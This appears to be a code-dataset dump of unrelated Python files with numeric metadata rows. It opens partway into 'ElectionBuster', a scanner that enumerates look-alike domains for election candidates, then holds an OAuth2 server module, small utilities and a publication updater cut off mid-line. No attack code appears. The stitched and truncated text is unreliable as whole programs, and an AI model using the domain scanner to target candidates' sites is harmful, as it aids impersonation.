+ lName + year + '.com') print('http://www.' + fName + lName + year + '.com' ) print('http://www.' + fName + lName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + year + '.com') print('http://www.' + position + fName + lName + '.com') # This is the result output files # Makes a unique filename based on data and time now = date.today() partyString = "" if ( args.party ) : partyString = "-" + party.lower() tempResults = 'results-' + fName + '-' + lName + '-' + stateText + partyString + '-' + str(now) + '.txt' resultsFile = open(tempResults, "w") # This clears the results files before reopening them resultsFile.close() resultsFile = open(tempResults, "a") ## Other alphabets are defined as a quick way of doing URL mangling. ## Is this a candidate for deletion? # alternative alphabets # 0: No change # 1: i -> 1 "Eye to One" # 2: l -> i "El to Eye" # 3: i -> l "Eye to El" # 4: o -> 0 "Oh to Zero" # 5: 0 -> o "Zero to Oh" # 6: n -> m "En to Em" TODO: Does this swap wrok right? # 7: m -> n "Em to En" # 8: e -> 3 "Ee to three" # 9: 3 -> e "Three to ee" # These are the template that we'll use based on the optional input parameters. # The first one is if the state was input. 
templates = generate_urls(first_name=args.firstName, last_name=args.lastName, state=state, middlename=args.middleName, position=position, altPosition=altPosition, year=args.year) # This generates the text mangling results = genAll(templates, alt_alphabets) # This generates the text mangling with some other alternatives resultsDonate = genAllDonate(templates, alt_alphabets) #### LOOP 1 #### # All examples use the input of 'josh franklin 2014 president DC' ################# #http://www.joshfranklin.com #http://www.josh2014.com #http://www.franklin2014.com #http://www.joshfranklin2014.com #http://www.joshfranklinforDC.com #http://www.joshfranklinDC.com #http://www.joshforpresident.com #http://www.josh4president.com #http://www.joshforpresident2014.com #http://www.josh4president2014.com #http://www.presidentjoshfranklin.com #http://www.president-josh-franklin.com #http://www.presidentjoshforpresident2014.com #http://www.presidentjosh4president2014.com #http://www.presidentjoshfranklinforpresident2014.com #http://www.presidentjosh-franklinforpresident2014.com #http://www.presidentjoshfranklin4president2014.com #http://www.presidentjosh-franklin4president2014.com def tryURL(url): url = stringAndStrip(url) for domain_name in tlds: print('Trying: ' + url + domain_name) allURLS.append(url + domain_name) print("Entering template loop 1^^^^^^^^^^^^^^^^^^^^^^^^^^" ) print(time.time() - start_time, "seconds") for r in results: tryURL( 'http://www.' 
+ r , ) ### LOOP 2 ### # Puts donate at the beginning & # Removes the period after 'www' ##############tlds a little tlds.append( '.republican' ) tlds.append( '.democrat' ) tlds.append( '.red' ) tlds.append( '.blue' ) tlds.append( '.vote' ) #These next few look for some of the larger parties tryURL( 'http://www.republican' + fName + lName ) tryURL( 'http://www.democrat' + fName + lName ) tryURL( 'http://www.libertarian' + fName + lName ) tryURL( 'http://www.independent' + fName + lName ) tryURL( 'http://www.vote' + fName + lName ) #Example: votejoshfranklin.com tryURL( 'http://www.vote' + fName + middleInitial + lName ) #Example: votejoshmichaelfranklin.com tryURL( 'http://www.vote' + fName ) #Example: votejosh.com tryURL( 'http://www.vote' + lName ) #Example: votefranklin.com tryURL( 'http://www.' + lName + position ) #Example: franklinpresident.com tryURL( 'http://www.' + lName + altPosition ) #Example: franklinprez.com tryURL( 'http://www.real' + fName + lName ) #Example: realjoshfranklin.com for stateAlias in state: tryURL( 'http://www.' + lName + 'for' + stateAlias ) #Example: franklinforDC.com tryURL( 'http://www.' + lName + '4' + stateAlias ) #Example: franklin4DC.com tryURL( 'http://www.friendsof' + fName ) #Example: friendsofjosh.com tryURL( 'http://www.friendsof' + lName ) #Example: friendsofjosh.com tryURL( 'http://www.' + fName + 'sucks' ) #Example: joshsucks.com tryURL( 'http://www.' + lName + 'sucks' ) #Example: franklinsucks.com tryURL( 'http://www.' + fName ) #Example: josh.vote tryURL( 'http://www.' + lName ) #Example: franklin.vote tryURL( 'http://www.' + fName + lName ) #Example: joshfranklin.vote tryURL( 'http://www.elect' + fName + lName ) tryURL( 'http://www.elect' + fName + middleInitial + lName ) tryURL( 'http://www.elect' + fName ) tryURL( 'http://www.elect' + lName ) tryURL( 'http://www.' + fName + middleInitial + year ) tryURL( 'http://www.' 
+ middleInitial + lName ) print( ' Total URLS: ' + str(len(allURLS)) + "\n" ) allURLS = removeDups( allURLS ) print( 'Unique URLS: ' + str(len(allURLS)) + "\n" ) pool = ThreadPool( 24 ) # Open the urls in their own threads # and return the results results = pool.map( tryURLforReal, allURLS ) pool.close() pool.join() #print(results) # Each thread added an entry for each result (found or not, gotta filter the blanks) # I'm doing this here sinced the file writes might not have been synchronized # its just a fear I had for i in results: resultsFile.write( i ) totalRuntime = time.time() - start_time, "seconds" ###### Write final results to logfile ########### resultsFile.write( "######################################" + "\n" ) resultsFile.write( "ElectionBuster Scan Results: " + "\n" ) resultsFile.write( "######################################" + "\n" ) resultsFile.write( "INPUTS = " + str(fName) + ", " + str(mName) + ", " + str(lName) + ", " + str(year) + ", " + str(position) + ", " + str(altPosition) + ", " + str(stateText) + ", " + str(party) + "\n" ) resultsFile.write( "Total runtime was " + str(totalRuntime) + "\n" ) resultsFile.write( "There were " + str(len(confirmedURLs)) + " positive results." + "\n" ) resultsFile.write( "There were " + str(len(testedURLs)) + " unique URLs tested." 
+ "\n" ) resultsFile.write( "-------------------------------------" + "\n" ) resultsFile.write( "Positive results: " + "\n" ) resultsFile.write( "-------------------------------------" + "\n" ) for url in confirmedURLs: resultsFile.write( str(url) + "\n" ) resultsFile.write( "\n" ) resultsFile.write( "-------------------------------------" + "\n" ) resultsFile.write( "EOF " + "\n" ) #for url in allURLS: # resultsFile.write( str(url) + "\n" ) # print( str( url ) + "\n" ) ###### Print final results to screen ########### print( "###################################### " + "\n" ) print( "ElectionBuster Scan Results: " + "\n" ) print( "###################################### " + "\n" ) print( "INPUTS" + "\n" ) print( "First name: " + fName + "\n" ) print( "Middle name: " + mName + "\n" ) print( "Last name: " + lName + "\n" ) print( "Year: " + year + "\n" ) print( "Election type: " + electionType + "\n" ) print( "-------------------------------------" + "\n" ) print( "Total runtime was " + str(totalRuntime) + "\n" ) print( "-------------------------------------" + "\n" ) print( "Positive results: " + "\n" ) print( "There were " + str(len(confirmedURLs)) + " hits:" + "\n" ) print( "-------------------------------------" + "\n" ) print( "\n" ) for url in confirmedURLs: print( url ) print( "\n" ) # Bad things happen if these files are not properly closed resultsFile.close()
35.568
204
0.647623
1,632
13,338
5.273897
0.262868
0.053677
0.040781
0.03137
0.237597
0.141745
0.090508
0.073312
0.073312
0.073312
0
0.008181
0.15692
13,338
374
205
35.663102
0.757225
0.276578
0
0.191304
0
0
0.237795
0.042837
0
0
0
0.002674
0
1
0.017391
false
0
0.06087
0
0.095652
0.2
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bc54e60d9317663e39e91ec8fe0cf6bc80d209
20,227
py
Python
core/authentication/__init__.py
Sick-codes/core
da9250f27a5de4fc3a08e9c47064b19f484b042b
[ "Apache-2.0" ]
null
null
null
core/authentication/__init__.py
Sick-codes/core
da9250f27a5de4fc3a08e9c47064b19f484b042b
[ "Apache-2.0" ]
null
null
null
core/authentication/__init__.py
Sick-codes/core
da9250f27a5de4fc3a08e9c47064b19f484b042b
[ "Apache-2.0" ]
null
null
null
"""Initialization of authentication.""" import json import logging import secrets import uuid from typing import TYPE_CHECKING, List, Optional if TYPE_CHECKING: from core.core import ApplicationCore import aiohttp_jinja2 from aiohttp import hdrs, web from ..const import CONF_TOKEN_LIFETIME from .auth_client import AuthenticationClient from .auth_database import AuthDatabase _LOGGER = logging.getLogger(__name__) logging.basicConfig(level=logging.DEBUG) class Authentication: # list of registered auth clients auth_clients: List[AuthenticationClient] = [] def __init__( self, core: "ApplicationCore", application: web.Application, auth_database: AuthDatabase, ): self.core = core self.app = application self.authorization = self.core.authorization self.auth_database = auth_database # Authorization Endpoint: obtain an authorization grant self.app.router.add_get( path="/oauth/authorize", handler=self.authorization_endpoint_get ) self.app.router.add_post( path="/oauth/authorize", handler=self.authorization_endpoint_post ) # Token Endpoint: obtain an access token by authorization grant or refresh token self.app.router.add_post( path="/oauth/token", handler=self.token_endpoint_handler ) self.app.router.add_post("/revoke", self.revoke_token_handler, name="revoke") self.app.router.add_get("/protected", self.protected_handler, name="protected") def add_client(self, auth_client: AuthenticationClient): self.auth_clients.append(auth_client) async def revoke_token_handler(self, request: web.Request) -> web.StreamResponse: """ Revoke the request token and all associated access tokens [RFC 7009] See Section 2.1: https://tools.ietf.org/html/rfc7009#section-2.1 """ _LOGGER.info("POST /revoke") await self.check_authorized(request) data = await request.post() token_to_revoke = data["token"] await self.auth_database.revoke_token(token_to_revoke) return web.Response(status=200) async def protected_handler(self, request: web.Request) -> web.StreamResponse: _LOGGER.warning("GET /protected") 
await self.check_permission(request, "library:read") response = web.Response(body=b"You are on protected page") return response @aiohttp_jinja2.template("authorize.jinja2") async def authorization_endpoint_get( self, request: web.Request ) -> web.StreamResponse: """ Validate the request to ensure that all required parameters are present and valid. See Section 4.1.1: https://tools.ietf.org/html/rfc6749#section-4.1.1 """ try: _LOGGER.debug(f"GET /oauth/authorize from: {request.host}") response_type = request.query.get("response_type") client_id = request.query.get("client_id") # validate required params if response_type is None or client_id is None: _LOGGER.warning("The response is missing a response_type or client_id.") data = """{ "error": "invalid_request", "error_description": "The request is missing a required parameter" }""" return web.json_response(json.loads(data)) # check if client is known if not any(client.client_id == client_id for client in self.auth_clients): _LOGGER.warning("The client_id is unknown!") data = """{ "error":"unauthorized_client", "error_description":"The client is not authorized to request an authorization code using this method." 
}""" return web.json_response(json.loads(data)) # validate response_type if response_type != "code": _LOGGER.warning( f"The request is using an invalid response_type: {response_type}" ) data = """{ "error":"unsupported_response_type", "error_description":"The request is using an invalid response_type" }""" return web.json_response(json.loads(data)) redirect_uri = request.query.get("redirect_uri") # extract client from registered auth_clients with matching client_id registered_auth_client = next( filter(lambda client: client.client_id == client_id, self.auth_clients), None, ) # validate if redirect_uri is in registered_auth_client if not any( uri == redirect_uri for uri in registered_auth_client.redirect_uris ): _LOGGER.error(f"redirect uri not found: {redirect_uri}") data = """{ "error":"unauthorized_client", "error_description":"The redirect_uri is unknown" }""" return web.json_response(json.loads(data)) scope = request.query.get("scope") requested_scopes = scope.split(" ") # TODO: validate scopes with regex => 1*( %x21 / %x23-5B / %x5D-7E )) registered_scopes = [ "openid", "profile", "email", "phone", "library:read", "library:append", "library:edit", "library:write", "library:share", "admin.users:read", "admin.users:invite", "admin.users:write", ] _LOGGER.debug( f"found {len(registered_scopes)} registered scopes and {len(requested_scopes)} requested scopes." ) # check if the requested scope is registered for requested_scope in requested_scopes: if requested_scope not in registered_scopes: _LOGGER.error( f"The requested scope '{requested_scope}' is invalid, unknown, or malformed." ) data = """{ "error":"invalid_scope", "error_description":"The requested scope is invalid, unknown, or malformed." 
}""" return web.json_response(json.loads(data)) # persist state to preventing cross-site request forgery [Section 10.12](https://tools.ietf.org/html/rfc6749#section-10.12) # state = request.query.get("state") # TODO: add scopes & localized descriptions only for requested scopes return { "requesting_app": registered_auth_client.client_name, "permissions": [ { "scope": "openid", "localized": "access the users public profile e.g.: username", }, { "scope": "profile", "localized": "access the users personal profile information e.g.: firstname, lastname", }, { "scope": "email", "localized": "access the users associated email address.", }, { "scope": "phone", "localized": "access the users associated phone number.", }, # { # "scope": "library.read", # "localized": "Read only Grant the user to list all photos owned by the user.", # }, # { # "scope": "library.append", # "localized": "Limited write access Grant the user to add new photos, create new albums.", # }, # { # "scope": "library.edit", # "localized": "Grant the user to edit photos owned by the user.", # }, { "scope": "library.write", "localized": "Grant the user to add and edit photos, albums, tags.", }, # { # "scope": "library.share", # "localized": "Grant the user to create new shares (photos/videos/albums).", # }, # { # "scope": "admin.users:read", # "localized": "Grant the user to list users on the system.", # }, # { # "scope": "admin.users:invite", # "localized": "Grant the user to invite new users to the system.", # }, # { # "scope": "admin.users:write", # "localized": "Grant the user to manage users on the system.", # }, ], } except Exception as e: # This error code is needed because a 500 Internal Server # Error HTTP status code cannot be returned to the client via an HTTP redirect. _LOGGER.error(f"an unexpected error happened: {e}") data = """{ "error":"server_error", "error_description":"The authorization server encountered an unexpected condition that prevented it from fulfilling the request." 
}""" return web.json_response(json.loads(data)) async def authorization_endpoint_post( self, request: web.Request ) -> web.StreamResponse: """ Validate the resource owners credentials. """ _LOGGER.debug("POST /oauth/authorize") data = await request.post() redirect_uri = request.query["redirect_uri"] if "client_id" not in request.query: _LOGGER.warning("invalid form") raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client") client_id = request.query["client_id"] _LOGGER.debug(f"client_id {client_id}") state = None if "state" in request.query: state = request.query["state"] _LOGGER.debug(f"state {state}") # check if client is known if not any(client.client_id == client_id for client in self.auth_clients): _LOGGER.warning(f"unknown client_id {client_id}") if state is not None: raise web.HTTPFound( f"{redirect_uri}?error=unauthorized_client&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client") # extract client from registered auth_clients with matching client_id registered_auth_client = next( filter(lambda client: client.client_id == client_id, self.auth_clients), None, ) # validate if redirect_uri is in registered_auth_client if not any(uri == redirect_uri for uri in registered_auth_client.redirect_uris): _LOGGER.error(f"invalid redirect_uri {redirect_uri}") if state is not None: raise web.HTTPFound( f"{redirect_uri}?error=unauthorized_client&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client") email = data["email"].strip(" ").lower() password = data["password"] # validate credentials credentials_are_valid = await self.auth_database.check_credentials( email, password ) if credentials_are_valid: # create an authorization code authorization_code = self.auth_database.create_authorization_code( email, client_id, request.remote ) _LOGGER.debug(f"authorization_code: {authorization_code}") if authorization_code is None: _LOGGER.warning("could not create auth code for client!") error_reason = 
"access_denied" if state is not None: raise web.HTTPFound( f"{redirect_uri}?error={error_reason}&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error={error_reason}") if state is not None: _LOGGER.debug( f"HTTPFound: {redirect_uri}?code={authorization_code}&state={state}" ) redirect_response = web.HTTPFound( f"{redirect_uri}?code={authorization_code}&state={state}" ) else: _LOGGER.debug(f"HTTPFound: {redirect_uri}?code={authorization_code}") redirect_response = web.HTTPFound( f"{redirect_uri}?code={authorization_code}" ) raise redirect_response else: error_reason = "access_denied" _LOGGER.warning(f"redirect with error {error_reason}") if state is not None: raise web.HTTPFound( f"{redirect_uri}?error={error_reason}&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error={error_reason}") async def token_endpoint_handler(self, request: web.Request) -> web.StreamResponse: """ Access Token: https://tools.ietf.org/html/rfc6749#section-4.1.3 Refresh Token: https://tools.ietf.org/html/rfc6749#section-6 """ _LOGGER.debug("POST /oauth/token") data = await request.post() # grant_type is REQUIRED if "grant_type" not in data: _LOGGER.warning("no grant_type specified!") data = '{"error":"invalid_request"}' return web.json_response(json.loads(data)) grant_type = data["grant_type"] # switch flow based on grant_type if grant_type == "authorization_code": return await self._handle_authorization_code_request(data) elif grant_type == "refresh_token": return await self._handle_refresh_token_request(request, data) else: _LOGGER.warning(f"invalid grant_type! 
{grant_type}") data = '{"error":"invalid_request"}' return web.json_response(json.loads(data)) async def _handle_authorization_code_request(self, data) -> web.StreamResponse: """ See Section 4.1.3: https://tools.ietf.org/html/rfc6749#section-4.1.3 """ # grant_type already checked # code is REQUIRED if "code" not in data: _LOGGER.warning("code param not provided!") data = {"error": "invalid_request"} return web.json_response(status=400, data=data) code = data["code"] # redirect_uri is REQUIRED if "redirect_uri" not in data: _LOGGER.warning("redirect_uri param not provided!") data = {"error": "invalid_request"} return web.json_response(status=400, data=data) redirect_uri = data["redirect_uri"] # TODO: compare redirect_uri with previous call _LOGGER.debug(f"TODO: compare redirect_uri {redirect_uri}") # client_id is REQUIRED if "client_id" not in data: data = {"error": "invalid_request"} return web.json_response(status=400, data=data) client_id = data["client_id"] client_code_valid = await self.auth_database.validate_authorization_code( code, client_id ) if not client_code_valid: _LOGGER.error("authorization_code invalid!") payload = {"error": "invalid_grant"} return web.json_response(status=400, data=payload) access_token, refresh_token = await self.auth_database.create_tokens( code, client_id ) payload = { "access_token": access_token, "token_type": "Bearer", "expires_in": CONF_TOKEN_LIFETIME, "refresh_token": refresh_token, } return web.json_response(status=200, data=payload) async def _handle_refresh_token_request( self, request: web.Request, data ) -> web.StreamResponse: """ See Section 6: https://tools.ietf.org/html/rfc6749#section-6 """ # code is REQUIRED if "refresh_token" not in data: _LOGGER.warning("refresh token not provided!") data = {"error": "invalid_request"} return web.json_response(data) refresh_token = data["refresh_token"] # check if client_id and client_secret are provided as request parameters or HTTP Basic auth header if "client_id" in data and 
"client_secret" in data: # handle request parameters client_id = data["client_id"] client_secret = data["client_secret"] elif hdrs.AUTHORIZATION in request.headers: # handle basic headers auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split(" ", 1) if auth_type != "Basic": return False # TODO: split auth_val in client_id and client_secret _LOGGER.error(f"split token into client_id and client_secret: {auth_val}") client_id = "" client_secret = "" registered_auth_client = next( filter(lambda client: client.client_id == client_id, self.auth_clients), None, ) _LOGGER.debug(f"client_id: {client_id}, {registered_auth_client}") if not registered_auth_client.client_secret == client_secret: _LOGGER.error("client_id does not match with client_secret") data = {"error": "invalid_client"} return web.json_response(data) access_token, refresh_token = await self.auth_database.renew_tokens( client_id, refresh_token ) if access_token is None: raise web.HTTPForbidden() payload = { "access_token": access_token, "token_type": "Bearer", "expires_in": CONF_TOKEN_LIFETIME, "refresh_token": refresh_token, } return web.json_response(payload) def create_client(self): """Generate a client_id and client_secret to add new clients.""" client_id = uuid.uuid4() client_secret = secrets.token_urlsafe(16) _LOGGER.info(f"generated client_id: {client_id}") _LOGGER.info(f"generated client_secret: {client_secret}") async def check_authorized(self, request: web.Request) -> Optional[str]: """Check if authorization header and returns user ID if valid""" if hdrs.AUTHORIZATION in request.headers: try: auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split( " ", 1 ) if not await self.auth_database.validate_access_token(auth_val): raise web.HTTPForbidden() return await self.auth_database.user_id_for_token(auth_val) except ValueError: # If no space in authorization header _LOGGER.debug("invalid authorization header!") raise web.HTTPForbidden() else: _LOGGER.debug("missing 
authorization header!") raise web.HTTPForbidden() async def check_permission(self, request: web.Request, scope: str) -> None: """Check if given authorization header is valid and user has granted access to given scope.""" # check if user is authorized await self.check_authorized(request) # check if required scope is granted await self.core.authorization.check_scope(scope)
39.738703
145
0.565531
2,117
20,227
5.217761
0.135097
0.033315
0.01883
0.030418
0.440703
0.345012
0.333152
0.257378
0.223339
0.205685
0
0.00743
0.341277
20,227
508
146
39.816929
0.8216
0.118999
0
0.319767
0
0
0.242739
0.05773
0
0
0
0.005906
0
1
0.008721
false
0.005814
0.031977
0
0.113372
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bc74d2f622c7d0048f1d7a1244333cdfa0d30a
785
py
Python
Utils/Image_processing.py
philshams/FC_analysis
cabe2385d5061d206a21b230605bfce9e39ec7f2
[ "MIT" ]
null
null
null
Utils/Image_processing.py
philshams/FC_analysis
cabe2385d5061d206a21b230605bfce9e39ec7f2
[ "MIT" ]
null
null
null
Utils/Image_processing.py
philshams/FC_analysis
cabe2385d5061d206a21b230605bfce9e39ec7f2
[ "MIT" ]
null
null
null
import cv2 def process_background(background, track_options): """ extract background: first frame of first video of a session Allow user to specify ROIs on the background image """ print(' ... extracting background') cv2.startWindowThread() if len(background.shape) == 3: gray = cv2.cvtColor(background, cv2.COLOR_BGR2GRAY) else: gray = background blur = cv2.blur(gray, (15, 15)) edges = cv2.Canny(blur, 25, 30) rois = {'Shelter': None, 'Threat': None, 'Task': None} if track_options['bg get rois']: # Get user to define Shelter ROI for rname in rois.keys(): print('\n\nPlease mark {}'.format(rname)) rois[rname] = cv2.selectROI(gray, fromCenter=False) return edges, rois
29.074074
78
0.628025
99
785
4.939394
0.606061
0.04908
0
0
0
0
0
0
0
0
0
0.02901
0.253503
785
26
79
30.192308
0.805461
0.182166
0
0
0
0
0.120827
0
0
0
0
0
0
1
0.0625
false
0
0.0625
0
0.1875
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bcdcd5e66866adeb754619341836bf5daa27c7
1,553
py
Python
python/ctci-merge-sort.py
gajubadge11/hackerrank-3
132a5019b7ed21507bb95b5063fa66c446b0eff7
[ "MIT" ]
21
2015-02-09T18:08:38.000Z
2021-11-08T15:00:48.000Z
python/ctci-merge-sort.py
gajubadge11/hackerrank-3
132a5019b7ed21507bb95b5063fa66c446b0eff7
[ "MIT" ]
7
2020-04-12T23:00:19.000Z
2021-01-30T23:44:24.000Z
python/ctci-merge-sort.py
gajubadge11/hackerrank-3
132a5019b7ed21507bb95b5063fa66c446b0eff7
[ "MIT" ]
27
2015-07-22T18:08:12.000Z
2022-02-28T19:50:26.000Z
#!/bin/python3 import math import os import random import re import sys # This solution times out on Hackerrank with Python 3 # However, it passes all test cases with Pypy 3 def countInversions(arr): global COUNT_INVERSIONS COUNT_INVERSIONS = 0 mergeSort(arr) return COUNT_INVERSIONS def mergeSort(arr): if (len(arr) <= 1): return arr # Split the array in two # Recursively sort both halves middle = len(arr) // 2 arrLeft = mergeSort(arr[:middle]) arrRight = mergeSort(arr[middle:]) # Merge the two halves mergedArray = [] leftIndex = 0 rightIndex = 0 global COUNT_INVERSIONS # Iterate through both lists and append the smaller element while(leftIndex < len(arrLeft) and rightIndex < len(arrRight)): if(arrLeft[leftIndex] <= arrRight[rightIndex]): mergedArray.append(arrLeft[leftIndex]) leftIndex += 1 else: mergedArray.append(arrRight[rightIndex]) rightIndex += 1 COUNT_INVERSIONS += len(arrLeft) - leftIndex # Append any left over elements mergedArray.extend(arrLeft[leftIndex:]) mergedArray.extend(arrRight[rightIndex:]) return mergedArray if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') num_test_cases = int(input()) for _test_case in range(num_test_cases): _ = int(input()) arr = list(map(int, input().rstrip().split())) result = countInversions(arr) fptr.write(str(result) + '\n') fptr.close()
24.650794
67
0.647135
183
1,553
5.377049
0.486339
0.07622
0.042683
0.030488
0.04065
0
0
0
0
0
0
0.008598
0.251127
1,553
62
68
25.048387
0.837489
0.175145
0
0.05
0
0
0.017282
0
0
0
0
0
0
1
0.05
false
0
0.125
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bd70b0b1f3c2fefc5fbd3c5e4dfb7838ccf414
447
py
Python
blogapp/models.py
FnK-Lap/Unchained
3a78d0597ab34737fdcc6d347c87063e93fad9cf
[ "MIT" ]
null
null
null
blogapp/models.py
FnK-Lap/Unchained
3a78d0597ab34737fdcc6d347c87063e93fad9cf
[ "MIT" ]
null
null
null
blogapp/models.py
FnK-Lap/Unchained
3a78d0597ab34737fdcc6d347c87063e93fad9cf
[ "MIT" ]
null
null
null
from django.db import models # Create your models here. class Post(models.Model): content = models.TextField() created_at = models.DateTimeField() def __str__(self): return self.content class Comment(models.Model): comment = models.CharField(max_length=200) created_at = models.DateTimeField() post = models.ForeignKey(Post, on_delete=models.CASCADE) def __str__(self): return self.comment
29.8
66
0.693512
54
447
5.518519
0.537037
0.067114
0.100671
0.187919
0.134228
0
0
0
0
0
0
0.008499
0.210291
447
15
67
29.8
0.835694
0.053691
0
0.333333
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0.083333
0.166667
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
3
99be8e0ad90bd5d8dfd03aaa447d0efe4fc69820
267
py
Python
FusionIIIT/applications/gymkhana/migrations/0014_merge_20200606_1238.py
sabhishekpratap5/sonarcubeTest2
9bd8105e457f6feb8c38fa94b335e54783fca99e
[ "bzip2-1.0.6" ]
2
2020-06-17T11:59:08.000Z
2020-07-10T12:17:35.000Z
FusionIIIT/applications/gymkhana/migrations/0014_merge_20200606_1238.py
sabhishekpratap5/sonarcubeTest2
9bd8105e457f6feb8c38fa94b335e54783fca99e
[ "bzip2-1.0.6" ]
19
2019-09-08T06:01:14.000Z
2020-05-21T09:08:20.000Z
FusionIIIT/applications/gymkhana/migrations/0014_merge_20200606_1238.py
sabhishekpratap5/sonarcubeTest2
9bd8105e457f6feb8c38fa94b335e54783fca99e
[ "bzip2-1.0.6" ]
14
2019-08-31T12:25:42.000Z
2022-01-12T08:05:33.000Z
# Generated by Django 3.0.6 on 2020-06-06 12:38 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('gymkhana', '0005_auto_20200605_0937'), ('gymkhana', '0013_event_info'), ] operations = [ ]
17.8
48
0.640449
32
267
5.1875
0.84375
0
0
0
0
0
0
0
0
0
0
0.171569
0.235955
267
14
49
19.071429
0.642157
0.168539
0
0
1
0
0.245455
0.104545
0
0
0
0
0
1
0
false
0
0.125
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99bf91ac2f49e24944ae85032ce5745ad6b70267
21,009
py
Python
ENCODE_publications.py
T2DREAM/pyencoded-tools
75fa636995bfc9fe181f9af490ce70dde3f6ce21
[ "MIT" ]
null
null
null
ENCODE_publications.py
T2DREAM/pyencoded-tools
75fa636995bfc9fe181f9af490ce70dde3f6ce21
[ "MIT" ]
null
null
null
ENCODE_publications.py
T2DREAM/pyencoded-tools
75fa636995bfc9fe181f9af490ce70dde3f6ce21
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: latin-1 -*- from Bio import Entrez from Bio import Medline import argparse import os import csv import logging import encodedcc EPILOG = ''' Takes in a VERY specific file format to use for updating the publications Also can update the existing publications using the pubmed database An EMAIL is required to run this script This is for the Entrez database This is a dryrun default script This script requires the BioPython module Options: %(prog)s --consortium Consortium_file.txt This takes the consortium file %(prog)s --community Community_file.txt This takes the community file %(prog)s --updateonly list.txt Takes file with single column of publication UUIDs, checks against PubMed \ to ensure data is correct and will update if needed ''' logger = logging.getLogger(__name__) def getArgs(): parser = argparse.ArgumentParser( description=__doc__, epilog=EPILOG, formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument('--consortium', help="File with consortium publication information") parser.add_argument('--community', help="File with community publication information") parser.add_argument('--outfile', help="Output file name", default='publication_results.txt') parser.add_argument('--key', help="The keypair identifier from the keyfile.", default='default') parser.add_argument('--keyfile', help="The keyfile", default=os.path.expanduser('~/keypairs.json')) parser.add_argument('--debug', help="Debug prints out HTML requests and returned JSON \ objects. Default is off", action='store_true', default=False) parser.add_argument('--update', help="Run script and PATCH objects as needed. \ Default is off", action='store_true', default=False) parser.add_argument('--create', help="Run script and POST new objects as needed. \ Default is off", action='store_true', default=False) parser.add_argument('--createonly', help="Run script and POST new objects as needed,\ only look up as needed. 
Default is off", action='store_true', default=False) parser.add_argument('--updateonly', help="File containing publication UUIDS from ENCODE database for\ updating. If the publication does not have PMID the script will\ find it comparing based on title and assuming unique title") parser.add_argument('email', help="Email needed to make queries to Entrez process") args = parser.parse_args() if args.debug: logging.basicConfig(filename=args.outfile, filemode="w", format='%(levelname)s:%(message)s', level=logging.DEBUG) else: # use the default logging level logging.basicConfig(filename=args.outfile, filemode="w", format='%(levelname)s:%(message)s', level=logging.INFO) logging.getLogger("requests").setLevel(logging.WARNING) return args class PublicationUpdate: def __init__(self, arguments): self.MAPPING = {"abstract": "AB", "authors": "AU", "title": "TI", "volume": "VI", "journal": "JT", "date_published": "DP", "page": "PG", "issue": "IP"} self.entrezDict = {} self.PATCH_COUNT = 0 self.POST_COUNT = 0 args = arguments self.UPDATE = args.update self.CREATE = args.create or args.createonly self.CREATE_ONLY = args.createonly self.UPDATE_ONLY = args.updateonly self.community = args.community self.consortium = args.consortium if self.UPDATE: print("Will PATCH publication objects as needed") if self.CREATE: print("POST new pubmeds") def setup_publication(self): '''consortium publications file''' self.consortium_dict = {} with open(self.consortium, 'r', encoding='ISO-8859-1') as f: reader = csv.reader(f, delimiter='\t') for PMID, published_by, categories, catch1, code, catch2, title in reader: categories = categories.replace(";", ",").rstrip(" ") published_by = published_by.replace(";", ",").rstrip(" ") cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")] pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")] temp = {"published_by": pub, "categories": cat} self.consortium_dict[PMID] = temp self.consortium_ids = list(self.consortium_dict.keys()) 
'''community publications file''' self.community_dict = {} with open(self.community, 'r', encoding='ISO-8859-1') as f: reader = csv.reader(f, delimiter='\t') for PMID, published_by, categories, data_used, catch1, catch2, title, catch3, catch4, catch5, catch6, catch7, catch8, catch9, catch10, catch11, catch12, catch13, catch14, catch15, catch16, catch17, catch18 in reader: categories = categories.replace(";", ",").rstrip(" ") published_by = published_by.replace(";", ",").rstrip(" ") cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")] pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")] temp = {"published_by": pub, "categories": cat, "data_used": data_used} self.community_dict[PMID] = temp self.community_ids = list(self.community_dict.keys()) def get_entrez(self, idList): '''gets the values from Entrez ''' handle = Entrez.efetch(db="pubmed", id=idList, rettype="medline", retmode="text") # records is an iterator, so you can iterate through the records only once records = Medline.parse(handle) # save the records, you can convert them to a list records = list(records) for record in records: tempDict = {} for key in self.MAPPING.keys(): if key == "authors": auth = ", ".join(str(x) for x in record.get("AU", [])) tempDict["authors"] = auth else: tempDict[key] = 